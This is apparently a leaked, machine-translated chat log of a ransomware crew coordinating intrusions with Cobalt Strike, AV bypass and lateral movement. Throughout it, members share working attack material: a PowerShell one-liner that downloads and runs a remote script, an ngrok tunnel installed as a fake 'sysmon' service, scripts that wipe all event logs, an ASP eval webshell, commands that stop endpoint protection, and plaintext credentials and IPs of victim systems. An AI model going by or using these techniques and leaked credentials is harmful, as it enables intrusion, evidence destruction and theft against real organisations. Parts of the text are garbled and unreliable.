Enjoy, give feedback, wait for updates and patch notes.
Thank you all.

Artifact Kit is used in the following cases :
	* Attacks -> Packages -> Windows Executable
	* Attacks -> Packages -> Windows Executable (S)
	* Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe)
	* Beacon's 'elevate svc-exe' command
	* Beacon's 'jump psexec' and 'jump psexec64' commands
``yeah ok, I'll get it right away@stakan take it for yourself right away``anyone has archives/listings ready for upload from the ones I asked yesterday? wow good how it's done in a minute``?

Make a listing of all in files in a particular archive without unpacking:
7za.exe l "Shared_BUSwine.7z" >> listing12.txt

Make a listing of all in files of all archives in the folder without unpacking:
7za.exe l *.7z >> listing14.txt
``Isn't it clear that botnet broke startup, fix it, 30-40 minutes and it will work freshfat32https://blog.sitedd.ru/archives/53ман for megatools
error not fixed, but started downloading) constantly flies out the error
ERROR: Can't login to mega.nz: API call 'us' failed: Server returned error EEXPIRED
despite the fact that I left the browser more than 10 hours agoanyone used the mega console client megatools?
you need advice i will get up and at 7:30 am Moscow time i will be there at 7:30 pm pm pm pm gentlemen sleep well tomorrow you have three nets under the lock and av to sort out on the end look for files only to download and locate something to do in the morning = )Do not type in the background
i already told you - there will be no problems with the tasks in the near future you have something to do, do not you?
bournesenergy.com 86kk
```
with yes rights, who? who's free? tell me whose server was it?
172.93.105.2
``A VERY handy subdomain searchhttp://raw.githubusercontent.com/Fadavvi/Sub-Drill/master/Sub-Drill.ѕh guys
can somebody give me a shodan account?
fuck yourAuoffline_winpwn.ps1 for machines without internet access, use the commands from the manual after importing ``Import-Module .\WinPwn.ps1
```
or
``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
``botch) just don't understand any errors or results all does)[ ](https://stylebrooks.com/group/general?msg=R67ManX6WHD3G6NAR) what does it do except do nothing?)[ ](https://stylebrooks.com/group/general?msg=R67ManX6WHD3G6NAR) :innocent:base where the creds are stored, holy of holies)[ ](https://stylebrooks.com/group/general?msg=ne3xJNNSiogD5TEZf) Security Account Manage data@all @altertert what is SAM data? https://github.com/S3cur3Th1sSh1t/WinPwn @all a very solid psh script, there is a nointeractive mod to work with cobalthttp://github.com/GossiTheDog/HiveNightmare@all in testingwho has a guide to how to armitge dedicate?@all working version of BOF compatible with styler, inside there is readme.txt file for review@general please all who use our BOF injector to inject locker into memory write down where it is blocked now for further testing
i will upgrade to a better version to bypass the bypass avr in what could be the problem? the listener is prescribed correctly, the port on the server is not busy works on any windows machine super, this is what you need) yes, you need it) and will it work on the admin station? then any authorization by cmb or rdp in lsass will his cleartext pass if he leaves the server, i will put there and wait until he comes back on, ok?but the bonus is you need to unlogin admin domain or reboot the server if you have a context domain admin can stick through remote register, wdigest key should stick, google guys, you need to steal the password of an admin at the time of entering his password when authorizing on the server, I have a 1 YES, need here go to the server and make the next time the admin came to the server and enter it creds - I got clipass, realistic in general?``reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``
Hi guys, could you please tell me how to deal with this... I'm trying to use port 3389 remotely. At the execution of the second command writes such a tip) `` ``

C:\Users\Administrator>PSEXEC.EXE \192.168.3.100 -u glocap.com\chin -p Gustav1!
 -s CMD

PsExec v2.32 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Serv
er" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localpo
rt=3389 action=allowThe operation completed successfully.

C:{Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

A specified value is not valid.

Usage: add rule name=<string>
      dir=in|out
      action=allow|block|bypass
      [program=<program path>]
      [service=<service short name>|any]
      [description=<string>]
      [enable=yes|no (default=yes)
      [profile=public|private|domain|any[,.]
      [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
      [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|
         <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
      [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=a
ny)]
      [remoteport=0-65535|<port range>[,...]|any (default=a ny)]
      [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|
         tcp|udp|any (default=any)]
      [interfacetype=wireless|lan|ras|any]
      [rmtcomputergrp=<SDDL string>]
      [rmtusrgrp=<SDDL string>]
      [edge=yes|deferapp|deferuser|no (default=no)
      [security=authenticate|authenc|authdynenc|authnoencap|notrequired
         (default=notrequired)]

Remarks:

      - Add a new inbound or outbound rule to the firewall policy.
      - The rule name should be unique and cannot be "all".
      - If a remote computer or user group is specified, security must be
        authenticate, authenc, authdynenc, or authnoencap.
      - Setting security to authdynenc allows systems to dynamically
        negotiate the use of encryption for traffic that matches
        a given Windows Firewall rule. Encryption is negotiated based on
        existing connection security rule properties. This option
        enables the ability of a machine to accept the first TCP
        or UDP packet of an inbound IPsec connection as long as
        it is secured, but not encrypted, using IPsec.
        Once the first packet is processed, the server will
        re-negotiate the connection and upgrade it so that
        all subsequent communications are fully encrypted.
      - If action=bypass, the remote computer group must be specified when dir=i
n.
      - If service=any, the rule applies only to services.
      - The ICMP type or code can be "any".
      - Edge can only be specified for inbound rules.
      - AuthEnc and authnoencap cannot be used together.
      - Authdynenc is valid only when dir=in.
      - When authnoencap is set, the security=authenticate option becomes an
        optional parameter.

Examples:

      Add an inbound rule with no encapsulation security for browser.exe:
      netsh advfirewall firewall add rule name="allow browser"
      dir=in program="c:\programfiles\browser\browser.exe"
      security=authnoencap action=allow

      Add an outbound rule for port 80:
      netsh advfirewall firewall add rule name="allow80"
      protocol=TCP dir=out localport=80 action=block

      Add an inbound rule requiring security and encryption
      for TCP port 80 traffic:
      netsh advfirewall firewall add rule
      name="Require Encryption for Inbound TCP/80 traffic
      protocol=TCP dir=in localport=80 security=authdynenc
      action=allow

      Add an inbound rule for browser.exe and require security
      netsh advfirewall firewall add rule name="allow browser"
      dir=in program="c:\program files\browser\browser.exe"
      security=authenticate action=allow

      Add an authenticated firewall bypass rule for group
      acmedomain\scanners identified by an SDDL string:
      netsh advfirewall firewall add rule name="allow scanners"
      dir=in rmtcomputergrp=<SDDL string> action=bypass
      security=authenticate

      Add an outbound allow rule for local ports 5000-5010 for udp-
      Add rule name="Allow port range" dir=out protocol=udp localport=5000-5010
action=allow

C:\Windows\system32>
``not for bots[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=dx2BCrmbMDc7M3gAY) it's more for your workstations cleaning if you have it, all logs leak there and you can't clean them that way
if not, then the logs are stored literally a couple of days, after loca forenziki more likely to pick up the logs of network equipment, and not the winnings clearing winnings logs absolutely useless exercise@all have a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can also do so
``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1"
``````
Cleaning Logs

1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them.

Get-EventLog -LogName *


2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop:

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }


3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time.

To display a list of logs registered in the system, run the command:

WevtUtil enum-logs

Clearing events in a particular log is done as follows:

WevtUtil cl Setup

Before clearing, you can back up the events in the logbook by saving them to a file:

WevtUtil cl Setup /bu:SetupLog_Bak.evtx

To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them:

Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName }

or like this

Wevtutil el | ForEach { wevtutil cl "$_"}


4 Log clearing can also be done from the classic command line:

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"


Log Cleaner Batnick

PHP:
 
break>"%CD%\server_log.txt"

break>"%CD%\logs\errors.log"
break>"%CD%\logs\log-core.log"
break>"%CD%\logs\warnings.log"
break>"%CD%\logs\plugins\mysql.log"


Clear all Windows Event Viewer logs
1. CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

2. powerShell
 Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
``okhwaiting for you there? Finally, everything is working fine Somebody already had this problem, I wrote to steven, maybe he can fix it Maybe I do not have enough rights to email? Well, if there will be a grid, we will dodost to cobalt no rights raised, no one has not shown anything yet raised rights?and what have you done? job on the cobait I found a bug, how to open the PM messages if they are not read (in the rocket), if anyone has such a problem in the future, please contact:) I would like to get a job, on the cobalt to workprivet. Eliminated the problem, tell me what to do, what I need to do, maybe some manuals, or to train on what can be? i have no idea what to do. i must try all possible options :) i do not know how to help i did not have this problem notification skips in the bottom corner and have time to read, but in the chat is displayed as unread and i can not open it, i can not open new messages, and older only open on the bug, i do not know what the hell, maybe i need to update something.. zto what he wrote before opened, the last two messages are hanging)) you just need the messages?Hi, I need to try the settings, messages are not readenenHi, checking connections, write something, two days we fuckin' do not understand what the problem is :) I'll try to figure it out, write it down I have no problems honestly chzvitsya as unread, but can not see you zhmoi read did not understand) hi, first need to figure out why I do not see messages in personal chat, only notifications fly through quicklywhich you need to teach?Hi, I'm all ready to go! restoring my computer after cleaning and formatting softswitch and otpisheponya, I will storm him) well it's okay, already wrote, silent popeishish steve if they did not give anything did not give him yet? hello +
any other ideas? ootlok during working hours people don't sit on their work computers. they seem to get fucked up about it... everyone uses smart phones... well except for work email... but it all depends on the office...
ups, dhl, royalmail++ are good options
add more, don't be shy )) newsmagazine users from the networks (work computers) @lexman @all tell me exactly what users Facebook, google, youtube, tiktok, netflix@all gentlemen pentesters, what sites or topics (not related to work) most often visited by corporate english speaking users? and immediately a question - and what does the girl with the daughter have to do with it?
the girl is a backup or something ahahahh i saw a congratulation from kaspersky labs somewhere today
girl with daughter walking through the woods and wrote "all administrators happy bekap day!"amen)congratulations to all with bekap day :smile:npa, I see spstut lies, do a search on the conference files or tell me where it lieswho has a sonic session checker compiled in the ehe? there is a fresh casehas to find an old granny with a vegetable garden)[ ](https://stylebrooks.com/group/general?msg=7TpZwjj8ZqehSCSre) Yes pomoyu at myself, but not sure, I personally use vmku debian crypto + elektrum via tor proxy, cid phrase buried at the granny in the gardenPlease advise on bitcoin storage
not store bitcoin at all?
the best option is a clean OS and electrum with backups ?
Aparthot wallet sounds cool, but if there comes an abuzz, you can stay without money - is that correct?
Rewrite it on Windows >Collecting all kinds of manuals there
who to add chat in the personal - will add#all_manualsPlay somewhere flashed man how to find the right process for all servers in the domain in particular sqlservr , can duplicate pliz in Ls@all write to the confab where appropriate sessions will passedvshe Hi, how do you solve the unloading of mailboxes if the mail server is not enough space? Who met with UrBackup? How do I determine where the backups go? In the folder looked around, the only thing I found, hints of linux.In the current case is such a thing, on the fs more than a million directories, all in French and German, to sort it out by hand quest unreal. That's why I first started using the software
WizTree, to create statistics of directories and filetypes, and now bypassing fucking crap, we pack the necessary files, for example, this command archives all pdf with X 7z a -tzip Y:\pdf.7z -ir!X:\*.pdfI have this idea - you can use as an alternative to rclone
Search by file mask excluding mp3 wav exe dll sys etc. + by date, pop up on the left menu and upload to sftp... http://seo-ng.net/seo-statiy/more/poisk-v-total-commander.html@all are there anyone without cases? https://askubuntu.com/questions/648555/bash-program-cannot-execute-binary-file-exec-format-error
ou're trying to run an executable compiled for an ARM architecture on an x86-64 architecture, which is much like asking your processor who only speaks English to take directions in Chinese.
seems to be compiled for ARM build, I tried to run it but nothing, I thought it was because of Java, I tried 3 versions, no way)
no working software for a particular lin seems to be, or 32 bit compiled or I do not know)bash: ./check-sonik: cannot execute binary file: Exec format egorponjaloalo fresh new sessions nagaetaaa it to that information that goes with the case it needs freshwhich you have from the archive which is in the confine lies the path to the file sessions.jsona where to get how to use)
" [path to sessions.json]
you have to write in the above linemanual from Code, just follow the instructions on how to use chesk-sonik.zip
Code March 16, 2021 5:58 PM

./check-sonik [site.com] [path to sessions.json]
At the end will output sessions with cookie tokens ready, no need to do btoa, here's an example:
User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMldJU3dWM2I4QT0=at least one, but this is the minimum call to support and dismantle all pk or where in my case was so, even after a complete shutdown inveigh'a
tried responder -I ppp0 -rdw -v tried it both 1st and 2nddid not catch anything right now, ifconfig oot@kali:/home/kali/Desktop# ifconfig
"eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
"inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
" inet6 fe80::a00:27ff:fe5c:6526 prefixlen 64 scopeid 0x20<link>
" ether 08:00:27:5c:65:26 txqueuelen 1000 (Ethernet)
"RX packets 9064 bytes 6293746 (6.0 MiB)
"RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 6950 bytes 572052 (558.6 KiB)
" TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
"
" lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
" inet 127.0.0.1 netmask 255.0.0.0
" inet6 ::1 prefixlen 128 scopeid 0x10<host>
" loop txqueuelen 1000 (Local Loopback)
" RX packets 40 bytes 2240 (2.1 KiB)
" RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 40 bytes 2240 (2.1 KiB)
" TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
"
"ppp0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1280
" inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1
" ppp txqueuelen 3 (Point-to-Point Protocol)
" RX packets 6 bytes 98 (98.0 😎
" RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 5 bytes 54 (54.0 😎
"TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:/home/kali/Desktop# responder -I ppp0 -rdwv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
|
| -|__ --| | | | || -| _|
|__| |_____|_____| |
___|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.0.2.0

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]

[+] Generic Options:
Responder NIC [ppp0]
Responder IP [192.168.149.140]
Challenge set [random]
Don't Respond To Names ['ISATAP']



[+] Listening for events...
and it's not catching anything.
on the VPN interface, right?" ppp0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1280
"inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1
start like this responder -I ppp0 -rdwv what conditions?
axis, interfaces

on the virtual machine you get two local ranges probably and invei/responder works on the "first" local one guys, responder inveih, on the virtual box does not work but on the grandfather connected to the grid does, why does not work on the virtual machine connected to the grid?all got it, there artifact work koba someone did stage cna for bacon? @all who needs in the next hour and a half to redo the session - throw ipaks in the appropriate configurations who already did that?
```
https://github.com/p3nt4/Invoke-SocksProxy
https://github.com/tokyoneon/Invoke-SocksProxy/
``OK, thanks@steven ask himHello, who can decrypt the hash?
```BC98FFCB81EC7BC81C7C8BAE6292BCBE```
I can't get cmd5 and I need the passkey. Or maybe another service in mind? Who has an account on Zoom info, share plzPisplayed in PM.@all guys who viams decrypted, in pm plz, a couple of questions have@Air poured the date here pour
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
``@Air give me hell here, thank you, I will put you in the group hello, alter asked to write off who is available to teammates, I do not do anything yet konkretnymesheskikh servoki localyya ekshi build vzhelemGod, who ``ESXi` servoki `nix` version local, knock in the personal, please.alex hasn't been heard since friday, gone somewhere, i have been watching him not always, but he is cheating almost alwaysHi
Does the Kaspersky dll injector work? Or does it work ?[ ](https://stylebrooks.com/group/discussion?msg=EDMeyq7jo7BZxma9r) give details in a personal if there is a YES - we can finish upgmer once killed him, but only in 1 network worked, apparently was badly configured, but the admin palil after thatPareni! against Cylance edr is meaningful to fight?i can't see it in the new rocket1 minszczady i'll see it in the new rocket, i can't leak it without a "jump?" what's the problem with remote dumping lsaas? on the 24th of march?
Who in our brute force team can help?
salt hashes
https://en.wikipedia.org/wiki/Salt_(cryptography), tomorrow i'll sit down to test something to change the injector cobalt slightly more advanced avs have been stinging for a long time
but this is the first time I've seen defender scorch everything, good evening koba?
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 219946 bytes
[+] received output:
EntryPoint found
[+] received output:
Injected.
```
with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace them and everything should start
the only Bofy cna not changed? oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT
ARTIFACT KIT UPDATE
everyone download the archive and replace the files in the folder "over", all files! kkrinter@alter @prince addit kto know how to know what will be the size of the folder with the files for the last 2 years for example? that from the total mass of files to estimate the future size?I'll hook you up with alex and give you the net. now it's ok. everything should be ok. now just log in. i can't. i have to take the trouble to read your messages. maybe i don't have enough rights to write in private? i should see why i can't see your messages in private, but in groups all is ok. wait 10-15 minutes. i will hook you up with someone else. hi, i remember. got any work to do for practice? and the vpn's about to be stripped downgotbots are here1.com@all beep, who worked with hashtag, dictionaries. need a little advice@atom write eldorado he might know@Airzaley fucking data we're trying to make money on this, seriously?it is not re-scheduled what? transferred? if so - add please @jask where did you pour? do not see on the server can:) thought myself in the code lost / lost)) A) written script lost. I udmay have asked) \and what lost? Got it, thanks.Yes, I wrote, lost.create a database where NTLM is the id, and match the
Googling, tons of options...write a script, a simple one, whatever, there are 3-5 lines of comparison and matching...Gentlemen, advise me, maybe there is a solution not by hand.
I have two files.
First one with lots of lines in format `USER:NTLM`, second one with less number of lines in format `NTLM:PASSWORD`.
How to combine what would end up being `USER:PASS`? = )well yeah you can do that with psyngect, is there any compiled software on sharps? and what's this for?
it turns out no one is listening to me
so I'll say it again
to all of you with eyes and ears
before locking up, use the home run session gopher

https://github.com/Arvanaghi/SessionGopher
To run remotely (-iL, -AllDomain, -Target)[ ](https://stylebrooks.com/group/general?msg=7tCjveXyDBBxXs3yy) dump @steven in pmpom help with hash: d62fdc9dfa81e87e27baa523266bd3e2
thanks)@t3chnolog sorry, didn't know. My respects! :) when you hang the service console output does not ktokno kmd opens when you just start Ngrok, this is the usual console outputThis is my script tastemtanapis in pm)Under yourself, just change the need, if you do not understand - beep PM, I will help you.``
mkdir "C:\Windows\tmp"
# Download NGROK
$clnt = new-object System.Net.WebClient
$url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
$file = "C:\Windows\tmp\ngrok.zip"
$clnt.DownloadFile($url,$file)

# Unzip NGROK
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C://Windows\tmp\")
$destination.Copyhere($zip_file.items())


#Download NSSM

$clnt = new-object System.Net.WebClient
$url = "http://nssm.cc/release/nssm-2.24.zip"
$file = "C:\Windows\tmp\nssm.zip"
$clnt.DownloadFile($url,$file)


#Unzip NSSM
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C://Windows\tmp")
$destination.Copyhere($zip_file.items())


Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"


echo 'authtoken: 1nkQQQOeCRwXSyjxVs1jCOvlQ6XQ_s2fbYS124PZwt36bUVP5
tunnels:
    default:
        proto: tcp
        addr: 3389' > "C:\Windows\tmp\config.yml"



cd "C:\Windows\tmp\nssm-2.24\win64"
.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config="C:\Windows\tmp\config.yml"

Start-Service sysmon
```
 I have a connection to the ngp in the background, when I start the output in the cmd, and when you close the tunnel falls, and so should it be? @all write in confes where to reshoot the session, now we will try[ ](https://stylebrooks.com/group/general?msg=SpC3HH2sqgzCCqMRG) wait above )):rocket:hey all. someone rolled up a veeam on a dedicated?
pm plz $50k BTC-USD, gentlemen! :)Gentlemen, good evening everyone!
Has anyone encountered Datto? has anyone worked through ipv6? and what are the legitimate ways to remove ntds now? i usually run through exchange. One of the most survivable backdoors. no php there.
I don't know about the obfuscated code, it will probably work, I don't know how to do it. is obfuscated code also dumped? often on servers with aspx, maybe pxp is up there, you can also dump a pxp webshell...thanks
check it out again
i've solved this problem long ago - i used a legitimate file explorer, and then i uploaded the one that is not stolen by the aver
I'm looking for the easiest way which will be close to fudumassa optionshttp://github.com/tennc/webshell/tree/master/asrprosto also never worked with ASP, but judging by the context so...well you need to pass the command parameters, like cmd=dirS ASP not worked, but apparently yes.Who knows a little about ASP coding?
``` <% eval request("cmd") %>
```
Is this code just GET / POST code in CMD?
thanks[ ](https://stylebrooks.com/group/general?msg=SQdkRoqS256EjYEJc) pm@all have a working email on proton?

"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop

tried it yesterday, it asked for password@all please note it does not work like that anymore = (
the old bug - removed khadyCrowdStrike pomoymu change the name of the dir and rebootSimantec command abovedefender gpok as AV stew listen and ask pliz notes hisponyal - ok) asked what would not screw up servaks) spasibparu days hangs all is wellvse window comepara new servers on the new profileParni, all hi! Was the topic that flew sessions kgbschih. At the time when it was massive, I bypassed, and now flies - a terrible nuisance. Solved by changing the profile? Or I remembered something wrong with the password is extinguished as follows.
``"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop
``Has anybody had any experience with removing ntds from the nix cd? I'm sorry I misunderstood. I don't need templates. What exactly do I need to download? can somehow, but I did not understand, usually the tool does itopolyubomu they human-like and similar to those we have a pool of similar passwords I mean if you give the program a pool of characters and similar passwords and it will search by pattern + passwords that in Chrome from the administrator you stole passwordsobviously helps passwords from nds decrypt and search 1-2 thousand passwords there hashes for 4 days on brute force and hashkatkonno from there exports hashkdb who knows any password rebuilders for jdb
Duo Security bypassed in the end ? hello, has anyone encountered a Cortex XDR ? Monitoring some kind of av , blocks everything in a row , any activity in the network . Can bring it down can be how then, cut off even the white software to close the processjeremytonylexmanternert3chnologichelloworld123@rozetka from here look. remote-exec did not have time to try) the problem was in DA, namely on these servers, he did not work for some reason, change the token to another DA and all norm started and knocked off)[ ](https://stylebrooks.com/group/discussion?msg=fa8xtobiv8r3Ti3QP) tried remote-exec ?
set command cmd /c ping google.com hmmm maybe the problem is in the pc from which I launch vmik or task, it writes access denied when executed ... how to ping another server on google com or netstat?) Previously done through a task or vmik, threw at the desired server batinny with the commands and the output in txt, but now it does not work, there is still some other option?) This is your server, where you want to get. pinging google com or netstat snimeya sorry read wrong wmic and task does not work, I'm trying to remotely run on another pc to run there bilds indication of the kred just no accessa server look outside?
shell wmic /node:192.168.0.6 /user:Administrator /password:Blue22Sky@@ etcHelp) I want to run koba on other servers, before that was fine, but on one where sql database does not give. Run through wmic and through the task error no access
ERROR:

Description = Access is denied.
The token is from YES and I can access all the disks safely
What's that got to do with it?
 I'm gonna have to tell you, they scanned it or something.
fort fuckin' blocked it.
still nothing
nothing can be done yet
``Fort with a default route, someone can tell me how to do it, they say it might help`` route add 192.168.0.0 mask 255.255.0.0 IF 19

Try it this way
If that doesn't work

route add 192.168.0.0 mask 255.255.0.0 10.212.134.110 IF 19
p\s this one doesn't work``.
C:\Users\Administrator>netsh interface ipv4 show interfaces

Idx Met MTU State Name
--- ---------- ---------- ------------ ---------------------------
  1 50 4294967295 connected Loopback Pseudo-Interface 1
 12 5 5 1500 disconnected Ethernet
 13 5 5 1500 disconnected Ethernet 2
 14 20 20 1500 connected Ethernet 3
 15 5 5 1500 disconnected Ethernet 4
 18 20 20 1500 disconnected Ethernet 5
 19 1 1392 connected Ethernet 6


C:\Users\Administrator>
``````
C:\Users\Administrator>ipconfig /all

Windows IP Configuration

   Host Name ... ... ... : front1
   Primary Dns Suffix ... . :
   Node Type . . . . . ♪ Hybrid ♪
   IP Routing Enabled. . . . No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .

Ethernet adapter Ethernet 6:

   Connection-specific DNS Suffix :
   Description . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter

   Physical Address. . . . . : 00-09-0F-AA-00-01
   DHCP Enabled . . . . ♪ No ♪
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::4cf6:80d9:8658:d4bc%19(Preferred)
   IPv4 Address . . . . .: 10.212.134.110(Preferred)
   Subnet Mask . . . . : 255.255.255.255
   Default Gateway . . . . :
   DHCPv6 IAID . . . . . : 671090959
   DHCPv6 Client DUID. : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C

   DNS Servers . . . . . : 192.168.1.40
                                       192.168.1.18
   NetBIOS over Tcpip . ♪ Enabled ♪

Ethernet adapter Ethernet 5:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6
.30)
   Physical Address. . . . .: 00-09-0F-FE-00-01
   DHCP Enabled. . . . ♪ Yes ♪
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet 4:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n #4
   Physical Address . . . .: 00-25-90-57-E5-8D.
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet 3:

   Connection-specific DNS Suffix :
   Description . . . . . . : Intel(R) 82574L Gigabit Network Connectio
n #3
   Physical Address . . . .: 00-25-90-57-E5-8A.
   DHCP Enabled. . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address. : fe80::31f5:3b79:943a:4573%14(Preferred)
   IPv4 Address. . . . . . 199.241.189.38(Preferred)
   Subnet Mask . . . . : 255.255.255.252
   Default Gateway . . . . : 199.241.189.37
   DHCPv6 IAID . . . . . : 436217232
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C

   DNS Servers . . . . . : 192.168.1.40
                                       192.168.1.18
                                       8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. .: Enabled

Ethernet adapter Ethernet 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n #2
   Physical Address. . . . .: 00-25-90-57-E5-8B.
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n
   Physical Address. . . . .: 00-25-90-57-E5-8C
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Tunnel adapter isatap.{E36713F6-455F-40D0-AB94-C1C24C36EF31}:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes

Tunnel adapter 6TO4 Adapter:

   Connection-specific DNS Suffix :
   Description . . . . . . : Microsoft 6to4 Adapter
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . . .: Yes
   IPv6 Address. . . . : 2002:c7f1:bd26::c7f1:bd26(Preferred)
   Default Gateway . . . . : 2002:c058:6301::1
   DHCPv6 IAID . . . . : 587202560
   DHCPv6 Client DUID . . . . : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C

   DNS Servers . . . . . : 192.168.1.40
                                       192.168.1.18
                                       8.8.8.8
                                       8.8.4.4
   NetBIOS over Tcpip. .: Disabled

Tunnel adapter isatap.{A623B785-E644-477C-BB93-A087554D1E25}:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter #2 ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . . .: Yes

C:\Users\Administrator>
``````
C:\Users\Administrator>route print
===========================================================================
Interface List
 19...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 15...00 25 90 57 e5 8d ......Intel(R) 82574L Gigabit Network Connection #4
